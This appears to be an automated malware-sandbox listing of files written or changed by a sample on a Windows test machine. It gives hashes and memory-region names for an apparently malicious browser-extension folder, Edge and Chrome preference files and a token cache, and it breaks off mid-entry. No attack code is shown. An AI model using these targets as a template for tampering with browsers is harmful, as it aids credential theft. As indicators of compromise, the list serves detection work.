C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\tabs.js
| MD5 | 6b14682af71d2704652b5696ec171503 |
| SHA1 | bed9d09586eb0a36b4b0a5c94f58ad396b0ec4d8 |
| SHA256 | 64230c97f0c3a41a00f2870ddf43c7395de5b2f670fd86defe9ed3c38a98cf41 |
| SHA512 | ebf1b684f1d1e88df84eadfc9f5e5b05c2de808b11a735c4fcc7e5eab18a0d1acaa8981dbe245de693c6565bb7e678ea9dd35af90dad68f64d2b6f0fef393598 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\config.js
| MD5 | a878ecacf4dc4aab506c9a254820c0b6 |
| SHA1 | 39879f934be94420b44958de255656076868e471 |
| SHA256 | 4af3507947e78a2513c700e292b97b86315b9cc09452dd06613c75e2e2785d12 |
| SHA512 | 8c1ea24f3304c22c3fdaf470013cf16ba46e5509a8ca7b6fcd2483407301a7823d9285a7e78ec1ce1157145c2fe3bb3c5f3cf236e4edeba887a8666a1bd3867f |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\notifications.js
| MD5 | c3e86f0f429df23fdc99412ec7cb5ec5 |
| SHA1 | beb75283be1c64058659b96a8ed09ef8de86e1de |
| SHA256 | f6bb14e081ec4f795faccec11ad6fd7fc4766c7fe9260fc72a9fdfadec8ec252 |
| SHA512 | 9d606f87558450d6a48211ed8a7623968843f2b60d3d23d6934f767cf8a601e8e0faa41d5110967c99e671318b3bb62c7d0a898a7db7cbe596bca05b4fbd6190 |
memory/3844-461-0x0000000002760000-0x0000000002B60000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 319a6e936ea99a79ed12f245f4036963 |
| SHA1 | 54e1ab2a2c2a6a90861bb1d949a25379ee2ee2f7 |
| SHA256 | 2cb9cbe5cb69a689ee5ae0fb10cd84de8c074d2712547549062b07cd54965498 |
| SHA512 | e15fa5ae33c44d4e44646d745b19ebc25a4103b1252320c1d5f27a7da9644e16768476625bfbdef145986c775c7367085205e14107e30e980476d0ed803e4250 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 489b769a1a9d09a9a703bd96a7b5c21f |
| SHA1 | 97a0991976fa10af8b5b8ce073d9d965c3c13494 |
| SHA256 | 4957d4d63830b470304cd9ba4a0b741cdc6d0eeadcf89f6bd9649220646aecd7 |
| SHA512 | 262f1e3dfca3d1d76e2f784ff737213fee9dabdcde72637c9a6b15bc79ade920ee10308ab0936ad105aab3f525d591ea952c5371592272f7516b26f7dd431aa3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1a5073af3482804f9040b8cba135d5d4 |
| SHA1 | 900ad2e4934c8257b968993c6d0ec87c325112fb |
| SHA256 | 148629523707b00b5c4e069e7250dbf5d8992df982cd5ead77dc693ae1837511 |
| SHA512 | 3705697ced4a4cf088d941da4ce962fc4cbc2a191cf6637783b9e986b444f54ebb92d631787c52bf7c577d5bbb3051435503a961ded32d1fb4ef79cb4b0f63cf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 5123ade7a73f8adcc69dcb72fdaae1ac |
| SHA1 | cf089058a4034ba0e2de7047d2bb963c08dffab3 |
| SHA256 | 62fd354db499ae4e64c25906cfc01c0d0a3498263471e3c24c2744e35aede79f |
| SHA512 | c0a9c55df12a179907f2f0ad6b8c68d9d867258d59fbdf2a5b31c1a423f022b67a24ee66e920dcc6e7bfc110894d4689b5f6ed1f045e7b912bba1fe3e6cf75bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9b71f176a47cff09137223b0244e2805 |
| SHA1 | c22d347c48b1857ae6297a4070c723c90f49b4f5 |
| SHA256 | 91def744fc82ae05f8120e486feb0b4ed777ccdfc8ad71ec5131324323b1b838 |
| SHA512 | e00dfb23a04652bac312e2daf50138e79c1d9ead424be44e8263ab36b46c2e7802a833abd44062a6650690d319b6d9f2a4bf429d8aa059a28c53fa4a973bb6f1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | 7d8b03404e2e89b0b6eb68349917bbcd |
| SHA1 | 07d5524ee044bc0e9102398af605323c74013f50 |
| SHA256 | e35190f8838fbae157ab1ef63baf7bdf9e2fd4ae7b179f581c471faf3058b156 |
| SHA512 | f15c9cff49550b976e8a733b9cc79241a2e2d0e7ecb9512989994cad058481171847af413f097c3cc0418d5e32ec71041a8c1a8037fe9f4814fe957b9ecd18d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5b0c03.TMP
| MD5 | 489f0dfbc6d01667889d4432be55c86d |
| SHA1 | 31fd85677df73a54c71383a542ff448a90452fa4 |
| SHA256 | 31e5fe7ee32919adc981e54f41b772341ee9023996f7110131d56989ab6bea33 |
| SHA512 | 74f3bd1c0f9ecdbd24c052b4832789b26554e38a6a448317af2df0ae13617faf2c2ec2b485cfb8bd80514e519de9f03ff065f392d265c4e430480ff2f862617c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 5524cba301c140331a1a2a2f7904be31 |
| SHA1 | 73e4385dd1809c6bb527da4666323d31b715b45d |
| SHA256 | 3391c8c88e244b0463fab1a1f7772477307832752e25f5a7df51f7a2e0dde912 |
| SHA512 | fe194adc4778ab4658b160b4d18a3329551009649e32dea036f50e2942d4f276267348d261246bb5c020886820a865d7c68c59aa069021d4c5f6288bb6830e18 |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | ab67e4770d689320881eeefd1f8ded07 |
| SHA1 | eb157c84187f6930a9060e4ac73dbe52bf73c8ff |
| SHA256 | 0377d4e9b609669d284576c9777a138a0c54fc89b3672d8869ac248fb99c579c |
| SHA512 | 2b141138a77dfedef4650225ffa6ebeb376d3f747e1b8e00365b671a9da45191b9af9da56af941f62b0140e08eb4930af38e2fc900b1d865c3abe32cfbc920b7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Temp\269d6cb3-50e7-48b4-b9cd-93590fa10ce5.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 7bcd0bea14fd7cf240db2b923760999e |
| SHA1 | 153359f9df51485f259b34bde05a7dc91744d826 |
| SHA256 | 969c143f5d7cca340ef7a3356d7651c2f2edee9592cc3ea2721b810abadd6c11 |
| SHA512 | 9ba63ac297f93c657626739258cee2912c584cfca2b3655da73d7b5aff53bf925022b333fcf5f292a9aec72148733f06235fa5790ced36ad8a8eeb527fa012d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 2597485e05dd1471d7119777b2a92666 |
| SHA1 | f1116746587b94222dc2b1c81bdaea3f443cdbff |
| SHA256 | d128d60491fed723df4047ba57e1a9fbdcffca5f085f2a14e1fd7c0bfc63fc9e |
| SHA512 | e3adbb408b61048f6be75b0dd7db09d3db85d9e726a515fc09aae052f872335e9da97a4fc5202135e1b270711ca244481dd52c5870db3efa312eafa1a6f35a7f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | b0f6eb97dee086c9e180067a064862c0 |
| SHA1 | accf4fdc9a88769369051e9ee0a7b2c723ec3f25 |
| SHA256 | b8bb0db75c84f0d8e4a03179c80dd7a8009d3997b6cf47daf0673b9075ee0826 |
| SHA512 | b18933491a9abb02fc39cdc72213e82b2f02329cccf4464062d857e6ab7325ead50e8cc204e7a76934b1574ec494dc9a650e247ea1b1953da2c87674747cfaa9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6ba87141618efbb3ecbe57f1bf47b700 |
| SHA1 | aee29e69ca09cd1db5592a54fabceb40f91d1822 |
| SHA256 | f6e68f3e58108b5c89a293f9a7865c5ee357cb805c0ab4b1ebf085baf3cbfc68 |
| SHA512 | 093538e946a1b2d5e61c303274b188518c0cb356566189eea30f2e2cb8a66d2dc8c970735032539e4e88643e8e8dd0220390f7c8ad6f584e2ddc84237bdd316d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | a44730a821e1b97724f134595ebf425c |
| SHA1 | c1c0681b3fe825727ab8e3b89e85f4409ec1db58 |
| SHA256 | 659f24408fe7a00d1defac879ee821cca25d1a3c9deaf005068a5218fb0df06f |
| SHA512 | 01f61c18736a0771b5ced7503992ef28d958de4cbebbc80320d9e328150f1eef6bcad68e8b07109d7dad31b5c62996927d10eb2fd88228541fbae0e10a5ae378 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | b468db5721c9bea3ee62e6641a2eec9b |
| SHA1 | 5d8673c8bdf1aab4b28a410ccfb04f2bf133bbb8 |
| SHA256 | 487e159403d5c227f56695fa7c9bfc27ff80a1dddea9418545a31c143aeae817 |
| SHA512 | d0da6e8aa970d72999c6d975935be30cd3a3e037bf7a90a6ff6df6dd3ca57a6f75eef74c6e5a8214848bdd1a403ca9a75a6f0b8a4beabedd15600f50f3dfff8e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ba5d56d8b9a3b54c5a9a571add32417c |
| SHA1 | 520a619fd900ae9da8c02e607b9b7a2fe5946f68 |
| SHA256 | 5f688ed7c8e15d6d5fc5688fe7da7203540f764e1f1e49114120a95e6778a162 |
| SHA512 | 203c75db65641c8677253b74f8d38ce9e43b68ad49786f6bacd621730bc5c6925afd008abb6a91d6ea6e3df79635dbe4554fa0db0cf818121363739184acf474 |
memory/2288-981-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-983-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-982-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-984-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-985-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-986-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-987-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-988-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-989-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-990-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-991-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-992-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-993-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-996-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-997-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-998-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-999-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1000-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp
memory/2288-1001-0x00007FF87F9A0000-0x00007FF87F9B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 7c2a94bd1042529c7c4436640fff94b7 |
| SHA1 | df542e78e77a92e7c69c95f2f1ad6420591ef291 |
| SHA256 | b8929be8a20b0b736aa2bf01910526c6007b3568ed8be63a11b4b008e090bcd1 |
| SHA512 | 2034043a27b4b8984dec729be8d5e66c926e5163aac4addc0182725b49fce0c495b8e08682940f566512f71617a438e208434208e184a84524f2c7549725e22f |
memory/2288-1036-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1037-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1043-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-1044-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-1045-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-1046-0x00007FF881A90000-0x00007FF881AA0000-memory.dmp
memory/2288-1047-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1048-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1050-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
memory/2288-1049-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 7202441009a21953c73a0e5c8587bd99 |
| SHA1 | 20593b74ebc6d3bff82df44accbc850983204786 |
| SHA256 | 78a2f852fa9bfdad524669a4e6125ea21ef69a7f33c7a48c609f557d7d77b54e |
| SHA512 | 09f2d053afb4c1c20150ab294de8e6969c7f189320e81d20e356ada83fb980369409f80ca70f9e0d61cceb68fbe73b34b45a6acb14c9328ff99e6866a30d03b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | c848ef6c8649b0cdb8c61b7655b56e03 |
| SHA1 | 9c6636c4c1671521fd63e1a2ff14bbec66892f3f |
| SHA256 | 26f83bdbd9fa4decdc73250ab788cf429a207a3d94d5cf1af5372018d1978153 |
| SHA512 | f0ae75728c472d2bc8657cd7b3294fcf2b7c413a28c60fddd44c01716f0cd87ecc26d4062ee10c14dd733ab90ae3d93021f5c6d455b86f7d01fc3c98f6f5d022 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | dae7ce8122789a22f1341632928523ec |
| SHA1 | 6d556c6623cb9ec19943c16dc8e9c885dec72285 |
| SHA256 | b6bcaa99e58edc1c3ef5157118e79ef12ae14b18470f0952dc9320f8a0a7a852 |
| SHA512 | 414257d4effbb50625412204f30715aaaf829c2b913857a4e2bd591b83b88db7c4b8b80ef84ff1e1ac611e3b051e3a66bbe944aca52e147d4f5a2ce3eeb3ccab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 848cdcb690e2d3ebef461807ffd02d5c |
| SHA1 | 9d55e5bbb00b0f8c7100f0c07dc471029c89e7a4 |
| SHA256 | 238ab7590e50c4122696846333f14fb2ebb8b147f12247207f5369d09715c5f9 |
| SHA512 | 0996431d5a3da2b799f34afe73716b89a7ca37dfd2d22ec5d5d994d3fbc3cbb79c5325097da1dab9764c7bde70773fe1c795f419d7e6bc8e2fbbf7bf42834a23 |
memory/1640-1090-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/1640-1089-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/1640-1091-0x000000006A800000-0x000000006A80F000-memory.dmp
memory/4912-1098-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/4912-1100-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/4016-1099-0x0000000065A80000-0x0000000065AAA000-memory.dmp
memory/4016-1097-0x0000000000400000-0x000000000054C000-memory.dmp
memory/4016-1101-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/4016-1102-0x000000006A800000-0x000000006A80F000-memory.dmp
memory/4912-1103-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/4016-1105-0x0000000063080000-0x00000000630A9000-memory.dmp
memory/2496-1113-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/2496-1114-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/2496-1115-0x00000000000E0000-0x0000000000108000-memory.dmp
memory/3700-1116-0x0000000000400000-0x000000000054C000-memory.dmp
memory/3700-1118-0x000000006B480000-0x000000006B4C1000-memory.dmp
memory/4212-1122-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp
memory/4212-1123-0x0000019FEE260000-0x0000019FEE270000-memory.dmp
memory/4212-1124-0x0000019FEE260000-0x0000019FEE270000-memory.dmp
memory/4212-1135-0x0000019FEE260000-0x0000019FEE270000-memory.dmp
memory/3456-1153-0x00000000000E0000-0x0000000000108000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5j8DxCjO4h6M7cc..dat
| MD5 | bc8c2ebedf8f83ad188ed263f1cd3375 |
| SHA1 | abc42cabb39db3cb6f4d6e526b2bd01fc99d58be |
| SHA256 | cd454c9fca4756a4e896a12686877ea8331928b7b9c2beba233df72426b9b7fa |
| SHA512 | 21216157309e04e3690b89914a0d22786f18f9f36a6d841bbca9328d58dd0a8804056e9beb9f462ddffe8114231b831eb46e26268920aeb94979cf3a226c70c5 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\rules.json
| MD5 | 6c96a8e0dc7f99afebd022054a96bff5 |
| SHA1 | 836c9f51bbbc8e5dc096cee29d7354b3a2211de1 |
| SHA256 | 464f3f4c07331ae1f15fe0e6a209b4cfaf8cfce14a7c79eb192cbf2c49bbcb19 |
| SHA512 | ebad39459aead9cac1d3d1bd27459de20f107a19c3492678b869d8488e014fb2fba168c7a0d98cfb7742a4052e20ba526bef29aa63cf79f923dbdb926c87469d |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\modules\content-scripts-register-polyfill.4.0.0.js
| MD5 | e2cdab6fd36bc5e771aa9e4ee2792ce4 |
| SHA1 | fd3fee7dc43c59636c8663a38cdef6ed1ccc6a25 |
| SHA256 | 9d1c97a6c1bf526de3f65a54f691d2540ca1dd300ed038f1df41f5fbd9ed2730 |
| SHA512 | e9741d3753f8483d033f00a4041d0d248b8013746d023ab31edeb649faf8f14a55e49a582fce1b0fa13866fc6d50917df683e3aca211d56b8e9855e7a93038fb |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\commands.js
| MD5 | 356e0d12f629ea365f915f4601251524 |
| SHA1 | 32abd4c94b877d2e4e68199c589fc9c5d96efabb |
| SHA256 | 185096fa1cda20813b58cae34659717e79fbd8bd8b89c95c9a93e3ca68efa2a1 |
| SHA512 | 5b742841924421fc32dc0206d40a011546fa29629077ee6df644d9c3aa2fe36bc01d4ad1a939b1a79d4b5ec6d82cdcd5b157ad4a438e34db7ba99eaedced9d68 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\extensions.js
| MD5 | cab74f7fb79c1921db62ffcbf2a43041 |
| SHA1 | 03d69ccbe480d09a94cbe394d9d5befcc68133ba |
| SHA256 | c4fe0a069bcc13d3f783deb92e3adab1053c5d99407547f1fcbe39c7f342af39 |
| SHA512 | 044754865af6950bf7b534e74d608bb47df3a537904f89e61bc4c2c03860de45786504e2fdebb4d4ef356c8ba078ce1fb185d4beb1fde1407c41511bdb07cc76 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\exchangeSettings.js
| MD5 | 055b125ec5b05895873435e423eca4f1 |
| SHA1 | 811c2f93b1b3644952c2a6eab8ef9dd8c9605edf |
| SHA256 | 2c9084f1d82aae713607e72e6f7825076328a9f3dfaa6ad89d7d069235a95e7c |
| SHA512 | ab99affad8a6f4762dc5ee2b906f7c2d4a0cfb448a095026d0039b74355b3a8303aafd97d1674fce2ef8db121a4beac134e356f86237ca45f14b155c5f5bdebe |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\app.html
| MD5 | a10ca2219a68335cf253395574f7d285 |
| SHA1 | a7111f1292518214ff4bf0920432c72c978c5b65 |
| SHA256 | e9b3c0b944e83cedb78440a99cb793fdf32fa6ea8c36fb89c638de75f3af602c |
| SHA512 | 61a1c7905dc6077fb2bc55296c7d477ca8fbf5e0763633356fdb32844f128313e629bb7c0f7081939b75eb5c452b8480e60b36eb88ca2477b5abd9b5eb4ccbe7 |
C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\utils.js
| MD5 | 86eaae8138cf039c05e0be5dc807d9f1 |
| SHA1 | 6a43f5227be21c2a3a2526cd3dd6a6e10425ea04 |
| SHA256 | 0f2b72153f263cfd7c2e5640d2362a1731253070c408d278ded46bb762e50f14 |
| SHA512 | 686e7090d10c35c404c510214a31d80a2ac041f6db2cb94d8f6f5ae47c146fb18eab96573c33e1d5ca4dfc21ac70abe94b4412d6b9621de9a9d01d85229acf99 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 31af3e895896b8bc25db0004afa3bb1f |
| SHA1 | bb8ce8e9e725f76a2d64d21afdfb287b4a74c11a |
| SHA256 | 142c5c4cfeb0b968fe312d89282b0d4979225b3285bfc1ba2fd5897d3487180c |
| SHA512 | ea7e780c2e8a42780c4dc19eb182dc8542f5b34047589a720c7b3fc4fdb76a992b3722d105f3ff617e0ede9ce37e7db3bc261081ff7b46d9924d96bfbd41756c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | ffb219f47d2339fd257b6bef93dd11e9 |
| SHA1 | 2efcfc93f9609a88e861126d84cfd59b2b318254 |
| SHA256 | 33ca89491898d6236f025c6e890a64a161a6ea7802d6ffd063926e3174d4c750 |
| SHA512 | 0e412a272fe86346a9a6489c703f36c2c658b4f1bafce072ac43aaeb3d5b33b05230599b6a8e8baebed519413dad7dcbe0e0ad8b13904a06c80c256b6aba1bba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c0aa56b55ea267df672bd20da3afe198 |
| SHA1 | a823036510dd563efd962a810897a45d78ca4b9c |
| SHA256 | b8ed7d1bb5afd384da5db05fb8f369fc618f0f40b0966f64c3ade80049c41d22 |
| SHA512 | ea66ecc5a1b3492fa8f96d8f42209d803c9e14539451a06d2727e99b81a403dbdb5df94e4407a5508ebe3217a4b7afdab2958ebf39efe58558cd8769034e5352 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a421394116d7192e61e44dcca8be2b1f |
| SHA1 | 277706740e054511b9f9566046eeb3e5a92176b4 |
| SHA256 | 2b9a05993ff2bc5552e8270759112d3ca61c1e34d7fc19654eab4075e854441b |
| SHA512 | a6e988c4aa12f8c96a5039c24d996ed2f8efdf612fe77de5e2fca63d3a1436dcca31b7d14d9fb6fe3face43e70bca8cd797a96f2bdd404872eb43d7593743562 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b6a2107c0bf35a9c542f6ea337939a4d |
| SHA1 | 0e5015bcd2c1bbac0790696a6af69724a9fe218d |
| SHA256 | d1ed1a71ff94d7d2ebe02bd87ea2b439d25552a2fea59c142b081a80f910aed6 |
| SHA512 | 8906be1e7432f5aaab05a4bffe85460c6e6fec7b6052d1c3060de40370380bf0e236a10a7cdd3c3ed3724dd203a348ad372769a6b7ffcba58513bcbbd221c9c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e66048e11418e28153d4a508e6e3ebda |
| SHA1 | f819e21c18516b257b4a62fe218a5edf6e067f8e |
| SHA256 | c3f7902a1f34e0611e2b9e10d9804128e994b6f995b41c68aa261dc22c47bc43 |
| SHA512 | dcebea62a05bde4373982ceb6edbcafa23da187009f7949b47846749f23d5d4440d73c595e8f04044fb2ed5b1bee342759bd23e5415a35a58f439f8d692749e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 8c24bba1a11e3cb4000b3b8f15d82a66 |
| SHA1 | bb59e3574b1b0f497206eb37ffc7d9138b198200 |
| SHA256 | f2727a0d42fabb6cd86e1cdcf2f299afc43595a1f6804d957be87a5bf4cd65ca |
| SHA512 | b95f111b5b99647b3e3555a34de9fd3c6b8bbd795a646ca5b3948563b990daf041fb78fa1865dd8f5f99b85e423ccf07e8c5911f863ccdab03c88883aa256fed |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b0359595-04a9-467f-b06d-95c7ede11ec8.dmp
| MD5 | 295e9b37bc3a8699ac9d5d50d89b73d9 |
| SHA1 | 6e7671d80e81ad68a6f7ee56420ac9f076c162fe |
| SHA256 | 0088fcda612d3fbeeb1ed813669f96e9822243458d247c67238f7c20be5f403d |
| SHA512 | e3a9f309b0da9f3e91cad263d9ea4d0df049ffcfdd40852c0a161e6186b6a11dc6938ac9c9fbbf14ba5f9b3a5e3721e0af763750e0655e5a254b2251bfb08733 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0b821d41f9230f6d01e4fbf49a7c2937 |
| SHA1 | a4fe181bdeeb0e7a97813c1c4d604deb1ccb6f31 |
| SHA256 | 867eeb0668835879b2f2e99c4fc20c9318ffab5c82f091712efcd76f6f94cd00 |
| SHA512 | 85ea8b5667a18ab703f14a9fb63faf3160b8419b5f7e5f1d479d7666f4558f4cd7dcf4da6a36965daa45f5f3486dbdc06ec0e34b3a0c765855ff309f53595d5e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6e8402929329a1948373d43b96ae3b0f |
| SHA1 | a46eb3c12614ff4b850bf8cf4d492f596b8a207a |
| SHA256 | da4ea854907f1c8c8e655d7f3d7c19511fbbaf8fb6bba92471ba8962f10326a2 |
| SHA512 | e760d2820af6d4de29654cea592d8ff6f033482e2aa5b888ed45233ff30d01e38db8d9d074abd0c5e449270abfaf284db5752160891c0f2892142b261ac503ce |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8d3aec1158b16a4b346a5b1f9edce498 |
| SHA1 | b186c54befa103b3982e4b655d1fe781a1b277b5 |
| SHA256 | 859c7fc1d6735cec0d3b8b620199f3b63181bf5c28f89c4f0acd05e4ba3c919b |
| SHA512 | 40089f514147b0374e11ca4704126e42a1359fc01d35d6de0536a60cda1d9ad325d7b62c34fdc7966067252302ad3e062f05788adddeb354d4f76b0e46d81674 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 7bc5657e8c1e87a70e4c31e84f6b10eb |
| SHA1 | 6888bc8a52b514fd8ea71a5fa8590fc245420e98 |
| SHA256 | 734057e66f81b40992c1ffa55670b33e0d1288e36af53cc65d45066883987d60 |
| SHA512 | e59c2dc55624e1f1e43fd0a50b355a1863a0d5bc366cb00935eb2f080bf3d7096676d99d6c1bcd542ce6d26bceaf8bb0c921f73c23442babb3bc3bc38fb50a99 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1
| MD5 | f26372955c1344efee1686dd10fac4c5 |
| SHA1 | 6a0e58444e9f9be90588c397b37a438db2bed294 |
| SHA256 | b9b110e6e85ffabf8440785d4ac0e0924ec577be3edf1ba7d6fe466039e88cb8 |
| SHA512 | 706dc8267bc04acf6da06e93cdbdcc84b4ff56df4327c849472a73666a6dca113d8236dcc79c1bccc5b05d1ff8619c79e1334cfe159f3cf8be4f7cd082cfdb30 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000016
| MD5 | 757d6eefadad52434d858027028b5a5a |
| SHA1 | baa970f53eccf09e806f4d12840bd0dd172285a5 |
| SHA256 | ee5d5dc43d17b5c0e6871674128062560cf846a4cde2752bfdf91214bae301dc |
| SHA512 | ac09cfb97c3bf28b0cac425490ee0d263832946cfea99a13cccb7da5a586ba15ed0f6fbfe0bd7d9ec983b8b2717aa0e15abaa27239caca25fcebe840cb6555d1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ea2073edde46f27e79fd05eea3f52e3a |
| SHA1 | ddafdcf9cff8f7c5ac2b03ad62a79ee3d9ba0cef |
| SHA256 | 0d00aead436b1f8d6900964132eb475ba8e896d95d572d0f6d53c8d5993a837b |
| SHA512 | ffcf6c400eff528f05c88fc2a3568e44da6317bfe54971f0ab968a8771019536d721cb3301120c8230a2291c9c7deffa1e8fb964dedc0f8cbcb3b81b98f1cfb2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | 0ebf781469919430d17e3bc895a151d6 |
| SHA1 | 843540b5130b87996b1f8df08a1fa693269937be |
